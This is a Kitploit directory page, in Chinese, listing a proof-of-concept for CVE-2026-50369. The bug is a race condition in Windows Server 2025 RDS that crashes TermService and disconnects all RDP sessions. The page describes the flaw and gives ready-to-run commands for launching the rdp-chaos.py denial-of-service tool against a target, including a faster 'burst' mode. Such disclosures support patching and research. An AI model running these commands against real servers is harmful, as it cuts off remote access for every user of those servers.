Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-50369 — CVE-2026-50369 的 PoC 复现程序,该漏洞是 Windows Server 2025 RDS 会话主机上 rdpcorets.dll 中的 TOCTOU 竞态条件,可通过 RDP 会话断开导致 TermService DoS。 | Kitploit
工具/GitHubGitHub/mofarthim/cve-2026-50369
漏洞分析漏洞利用渗透测试红队
GitHubmofarthim/cve-2026-50369

CVE-2026-50369

CVE-2026-50369 的 PoC 复现程序,该漏洞是 Windows Server 2025 RDS 会话主机上 rdpcorets.dll 中的 TOCTOU 竞态条件,可通过 RDP 会话断开导致 TermService DoS。

查看仓库
212个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-50369

针对 Windows Server 2025 RDS 会话主机上 rdpcorets.dll!CRdpPipeGfxPlugin::Enable 中 TOCTOU 竞态条件的复现程序。

我将其报告为 DoS;该代码路径似乎还以某种方式启用了 EoP。 此复现程序仅是 DoS 路径的 PoC。

漏洞

Enable 在 this+0x60 处两次读取 COM 接口指针,且未进行同步。TerminateInstance 在其自身临界区范围之外清除同一字段。两者通过 PnP 设备到达和移除工作项在 NT 线程池上并发执行。第二次读取解引用空指针 → 访问冲突 → TermService 崩溃 → 所有活动 RDP 会话断开连接。

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
下载工具